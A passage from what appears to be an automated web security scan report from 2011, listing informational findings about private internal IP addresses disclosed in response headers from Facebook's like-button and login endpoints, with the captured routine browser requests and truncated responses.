GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f515d9c8%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cecac88%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb373bac8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c70b7c68%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb373bac8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8780059c%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb373bac8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df124995cf%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff3dd58e0a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb373bac8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.63
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:43 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f8780059c&origin=http\u00253A\u00252F\u00252Fwww.phuket.com\u00252Ff3dd58e0a8&relation=parent&transport=postmessage&frame=fb373bac8", "http:\/\/w
...[SNIP]...
23.19. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ; next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; expires=Sun, 23-Jun-2013 13:18:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.140.126
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:36 GMT
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed6102d%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.phuket-travel.com%2Fnightlife%2Ffantasea.htm%3Fpid%3DAWDINP1356&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/nightlife/fantasea.htm?pid=AWDINP1356
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.203.58
X-Cnection: close
Date: Fri, 24 Jun 2011 13:22:37 GMT
Content-Length: 6846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d507bd1c%26origin%3Dhttp%253A%252F%252Fwww.phuket.com%252Ff1873d0e58%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.phuket.com%2Fandamanwhitebeach%2F%3Fpid%3DAWDINP1314&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=423 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/andamanwhitebeach/?pid=AWDINP1314
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.203.34
X-Cnection: close
Date: Fri, 24 Jun 2011 13:22:28 GMT
Content-Length: 6800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.22. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.pymnts.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=box_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.pymnts.com/spil-games-selects-adyens-internet-payment-system-for-global-social-gaming-platform-20110208005240/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.175.63
X-Cnection: close
Date: Fri, 24 Jun 2011 13:30:36 GMT
Content-Length: 4370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.23. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=%2Fnews%2Ftechnology%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2Findex.html&layout=button_count&show_faces=false&width=95&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.172.45
X-Cnection: close
Date: Fri, 24 Jun 2011 13:30:59 GMT
Content-Length: 4439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ca890d2%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.phuket-travel.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.60
X-Cnection: close
Date: Fri, 24 Jun 2011 13:22:23 GMT
Content-Length: 6908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/&layout=button_count&show_faces=true&width=120&action=like&font&colorscheme=light&height=26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.7.34
X-Cnection: close
Date: Fri, 24 Jun 2011 13:32:15 GMT
Content-Length: 4357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.198.56
X-Cnection: close
Date: Fri, 24 Jun 2011 13:31:06 GMT
Content-Length: 6121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
23.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
